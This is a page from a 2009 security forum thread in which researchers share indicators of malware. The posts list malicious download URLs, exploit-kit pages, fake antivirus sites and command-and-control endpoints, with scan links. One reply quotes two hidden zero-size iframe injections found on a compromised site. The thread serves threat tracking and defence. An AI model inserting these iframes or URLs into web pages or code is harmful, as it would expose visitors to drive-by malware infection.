Author Topic: daily something......  (Read 837812 times)

June 04, 2009, 08:37:07 am
Reply #435

CkreM

Exploit (wepawet seems to fail on this one):
091809.ru/s/in.php
PDF:
091809.ru/s/pdf.php
http://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
Seems like a bit altered variant of Emold trojan:
091809.ru/s/load.php?id=3
http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358

FTP stealer:
club25plus.de/css/vv.exe
http://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
club25plus.de/css/frfr5.exe
http://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967

Fake AV:
tubepornolive.com/scan/
Exploits:
bfegrtuker.ru/bede/in.php
http://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
bfegrtuker.ru/bede/its/0.pdf
Flash:
bfegrtuker.ru/bede/its/0.swf
Trojan Oficla:
bfegrtuker.ru/bede/load.php?id=5
Trojan:
000007.ru/1007.exe
http://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
234871938123.cn/svcshostes.exe
http://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136

Trojans (all seem to be Rustock):
yayandex.com/1.exe
http://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
yayandex.com/2.exe
http://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
yayandex.com/3love.exe
http://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
All communicate with:
yabombs.com/1/getcfg.php
Mal-Aware

June 04, 2009, 07:12:40 pm
Reply #436

sparsha

Fake/Scare scanner

http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue

http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators

http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe

June 07, 2009, 06:07:13 am
Reply #437

CkreM

Fake movie page:
tube-xxx-work.com/xplays.php?id=40016
downloads:
exe-web-development.com/streamviewer.40016.exe
http://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815

Fake AV:
mysex-adult.com/promo1/soft/install-1557.exe
Rustock:
rarambler.com/ra/2.exe
http://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
systemjud.com/start/admo/getcfg.php
Mal-Aware

June 07, 2009, 01:20:34 pm
Reply #438

SysAdMini

Today a user reported the following:

i found these two in my site:

<iframe src="http://85.10.221.161/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

<iframe src="http://global-analitics.com/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

85.10.221.161/in.cgi?2
redirects to multiple exploits at
searchsuggest.cn/catalog/x.php?q=1
payload is
searchsuggest.cn/catalog/q.php?s=2'
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951

I'm unable to download it from machine, don't know why.

The other url
global-analitics.com/in.cgi?2
doesn't seem to work at the moment.
Ruining the bad guy's day

June 07, 2009, 02:37:53 pm
Reply #439

MysteryFCM

Payload:

/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255

/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214

I was only able to grab them by feeding it the correct referer (x.php?q=1)

I can't get the other one to work either .....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 08, 2009, 07:37:18 pm
Reply #440

sparsha

System Security rogue related sites

http://nicleaner.com/hitin.php?land=20&affid=02941
http://nicleaner.com/download.php?affid=02941

http://bestscanjet.com/index.php?affid=09300
http://bestscanjet.com/download.php?affid=09300

http://Dapcleaner.com/hitin.php?land=20&affid=02941
http://dapcleaner.com/download.php?affid=02941

http://sucleaner.com/index.php?affid=02941
http://sucleaner.com/download.php?affid=02941

http://Websecurityread.com/hitin.php?land=20&affid=02941
http://websecurityread.com/download.php?affid=02941

http://Spyscansolution.com/hitin.php?land=20&affid=02941
http://spyscansolution.com/download.php?affid=00000

June 09, 2009, 05:07:16 am
Reply #441

XiTri

http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker

June 09, 2009, 10:42:20 am
Reply #442

sparsha

Win PC Defender rogue
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe

Antivirus System Pro
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0

June 09, 2009, 11:08:00 am
Reply #443

promised

onlinegames
2:http://61.160.247.37/xiao/aa1.exe
2:http://61.160.247.37/xiao/aa2.exe
2:http://61.160.247.37/xiao/aa3.exe
2:http://61.160.247.37/xiao/aa4.exe
2:http://61.160.247.37/xiao/aa5.exe
2:http://61.160.247.37/xiao/aa6.exe
2:http://61.160.247.37/xiao/aa7.exe
2:http://61.160.247.37/xiao/aa8.exe
2:http://61.160.247.37/xiao/aa9.exe
2:http://61.160.247.37/xiao/aa10.exe
2:http://61.160.247.37/xiao/aa11.exe
2:http://61.160.247.37/xiao/aa12.exe
2:http://61.160.247.37/xiao/aa13.exe
2:http://61.160.247.37/xiao/aa14.exe
2:http://61.160.247.37/xiao/aa15.exe
2:http://61.160.247.37/xiao/aa16.exe
2:http://61.160.247.37/xiao/aa17.exe
2:http://61.160.247.37/xiao/aa18.exe
2:http://61.160.247.37/xiao/aa19.exe
2:http://61.160.247.37/xiao/aa20.exe
2:http://61.160.247.37/xiao/aa21.exe
2:http://61.160.247.37/xiao/aa22.exe
2:http://61.160.247.37/xiao/aa23.exe
2:http://61.160.247.37/xiao/aa24.exe
2:http://61.160.247.37/xiao/aa25.exe
2:http://61.160.247.37/xiao/aa26.exe
2:http://61.160.247.37/xiao/aa27.exe
2:http://61.160.247.37/xiao/aa28.exe
2:http://61.160.247.37/xiao/aa29.exe
2:http://61.160.247.37/xiao/aa30.exe
2:http://61.160.247.37/xiao/aa31.exe
2:http://61.160.247.37/xiao/aa32.exe
2:http://61.160.247.37/xiao/aa33.exe
2:http://61.160.247.37/xiao/aa34.exe
2:http://61.160.247.37/xiao/aa35.exe
2:http://61.160.247.37/xiao/aa36.exe
2:http://61.160.247.37/xiao/1.exe

June 09, 2009, 11:09:59 am
Reply #444

promised

onlinegames
hxxp://121.12.115.11:886/down/aa01.exe
hxxp://121.12.115.11:886/down/aa02c.exe
hxxp://121.12.115.11:886/down/ts.exe
hxxp://121.12.115.11:886/down/aa03d.exe
hxxp://121.12.115.11:886/down/aa04b.exe
hxxp://121.12.115.11:886/down/aa21g.exe
hxxp://121.12.115.11:886/down/aa05b.exe
hxxp://121.12.115.11:886/down/aa06d.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa08d.exe
hxxp://121.12.115.11:886/down/aa09a.exe
hxxp://121.12.115.11:886/down/aa10d.exe
hxxp://121.12.115.11:886/down/aa11a.exe
hxxp://121.12.115.11:886/down/aa12.exe
hxxp://121.12.115.11:886/down/aa13c.exe
hxxp://121.12.115.11:886/down/aa32e.exe
hxxp://121.12.115.11:886/down/aa33a.exe
hxxp://121.12.115.11:886/down/aa26d.exe
hxxp://121.12.115.11:886/down/aa27a.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa15d.exe
hxxp://121.12.115.11:886/down/aa17.exe
hxxp://121.12.115.11:886/down/aa18a.exe
hxxp://121.12.115.11:886/down/aa19c.exe
hxxp://121.12.115.11:886/down/aa20a.exe
hxxp://121.12.115.11:886/down/aa29a.exe
hxxp://121.12.115.11:886/down/aa22.exe
hxxp://121.12.115.11:886/down/aa23a.exe
hxxp://121.12.115.11:886/down/aa24.exe
hxxp://121.12.115.11:886/down/aa25a.exe
hxxp://121.12.115.11:886/down/aa28.exe
hxxp://121.12.115.11:886/down/aa30.exe
hxxp://121.12.115.11:886/down/ms.exe

June 09, 2009, 11:44:46 am
Reply #445

sparsha

http://av-guard.net/?uid=102&pid=3

June 09, 2009, 06:56:24 pm
Reply #446

promised

onlinegames
hxxp://www.2a8k.cn/d/51.exe
hxxp://www.2a8k.cn/d/50.exe
hxxp://www.2a8k.cn/d/29.exe
hxxp://www.2a8k.cn/d/13.exe
hxxp://www.2a8k.cn/d/24.exe
hxxp://www.2a8k.cn/d/25.exe
hxxp://www.2a8k.cn/d/35.exe
hxxp://www.2a8k.cn/d/34.exe
hxxp://www.2a8k.cn/d/33.exe
hxxp://www.2a8k.cn/d/36.exe
hxxp://www.2a8k.cn/d/42.exe
hxxp://www.2a8k.cn/d/39.exe
hxxp://www.2a8k.cn/d/43.exe
hxxp://www.2a8k.cn/d/22.exe
hxxp://www.2a8k.cn/d/23.exe
hxxp://www.2a8k.cn/d/26.exe
hxxp://www.2a8k.cn/d/27.exe
hxxp://www.2a8k.cn/d/32.exe
hxxp://www.2a8k.cn/d/28.exe
hxxp://www.2a8k.cn/d/8.exe
hxxp://www.2a8k.cn/d/21.exe
hxxp://www.2a8k.cn/d/20.exe
hxxp://www.2a8k.cn/d/11.exe
hxxp://www.2a8k.cn/d/19.exe
hxxp://www.2a8k.cn/d/10.exe
hxxp://www.2a8k.cn/d/18.exe
hxxp://www.2a8k.cn/d/9.exe
hxxp://www.2a8k.cn/d/3.exe
hxxp://www.2a8k.cn/d/4.exe
hxxp://www.2a8k.cn/d/7.exe
hxxp://www.2a8k.cn/d/2.exe
hxxp://www.2a8k.cn/d/17.exe
hxxp://www.2a8k.cn/d/16.exe
hxxp://www.2a8k.cn/d/15.exe
hxxp://www.2a8k.cn/d/14.exe
hxxp://www.2a8k.cn/d/12.exe
hxxp://www.2a8k.cn/d/1.exe
hxxp://5yttrre.cn/xx33.exe
hxxp://5yttrre.cn/xx13.exe
hxxp://5yttrre.cn/xx26.exe
hxxp://5yttrre.cn/xx27.exe
hxxp://5yttrre.cn/xx28.exe
hxxp://5yttrre.cn/xx29.exe
hxxp://5yttrre.cn/xx30.exe
hxxp://5yttrre.cn/xx31.exe
hxxp://5yttrre.cn/xx11.exe
hxxp://5yttrre.cn/xx9.exe
hxxp://5yttrre.cn/xx12.exe
hxxp://5yttrre.cn/xx14.exe
hxxp://5yttrre.cn/xx10.exe
hxxp://5yttrre.cn/xx39.exe
hxxp://5yttrre.cn/xx15.exe
hxxp://5yttrre.cn/xx32.exe
hxxp://5yttrre.cn/xx8.exe
hxxp://5yttrre.cn/xx17.exe
hxxp://5yttrre.cn/xx23.exe
hxxp://5yttrre.cn/xx20.exe
hxxp://5yttrre.cn/xx22.exe
hxxp://5yttrre.cn/xx25.exe
hxxp://5yttrre.cn/xx18.exe
hxxp://5yttrre.cn/xx19.exe
hxxp://5yttrre.cn/xx24.exe
hxxp://5yttrre.cn/xx6.exe
hxxp://5yttrre.cn/xx16.exe
hxxp://5yttrre.cn/xx3.exe
hxxp://5yttrre.cn/xx21.exe
hxxp://5yttrre.cn/xx5.exe
hxxp://5yttrre.cn/xx2.exe
hxxp://5yttrre.cn/xx4.exe
hxxp://5yttrre.cn/xx7.exe
hxxp://5yttrre.cn/xx1.exe

June 09, 2009, 06:58:24 pm
Reply #447

promised

hxxp://u.987255.com/image/svchost.jpg
hxxp://u.987255.com/image/dd.jpg
hxxp://u.987255.com/image/bd.jpg
hxxp://a.05916.com:666/40.jpg
hxxp://u.987255.com/image/zy.jpg
hxxp://download.leeboo.com/Gvod15_286.exe
hxxp://download.leeboo.com/QvodSetup13_286.exe
hxxp://www.rtmmd.cn/h/5.exe
hxxp://58.215.79.176:88/b8.exe
hxxp://58.215.79.176:8080/b3.exe
hxxp://58.215.79.176:88/5.exe
hxxp://58.215.79.176:88/10.exe
hxxp://58.215.79.176:88/7.exe
hxxp://58.215.79.176:88/cpa.exe
hxxp://121.10.108.42/cj/1hqq.exe
hxxp://59.34.197.133/down/25.exe
hxxp://121.10.108.42/cj/2hqq.exe
hxxp://59.34.197.133/down/24.exe
hxxp://59.34.197.133/down/21.exe
hxxp://59.34.197.133/down/23.exe
hxxp://59.34.197.133/down/18.exe
hxxp://59.34.197.133/down/12.exe
hxxp://59.34.197.133/down/11.exe
hxxp://59.34.197.133/down/13.exe
hxxp://59.34.197.133/down/14.exe
hxxp://59.34.197.133/down/17.exe
hxxp://59.34.197.133/down/16.exe
hxxp://59.34.197.133/down/9.exe
hxxp://59.34.197.133/down/10.exe
hxxp://59.34.197.133/down/8.exe
hxxp://59.34.197.133/down/7.exe
hxxp://59.34.197.133/down/19.exe
hxxp://59.34.197.133/down/6.exe
hxxp://59.34.197.133/down/3.exe
hxxp://59.34.197.133/down/2.exe
hxxp://59.34.197.133/down/22.exe
hxxp://59.34.197.133/down/4.exe
hxxp://59.34.197.133/down/1.exe

June 09, 2009, 07:27:36 pm
Reply #448

CM_MWR


June 10, 2009, 04:55:05 am
Reply #449

promised

hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe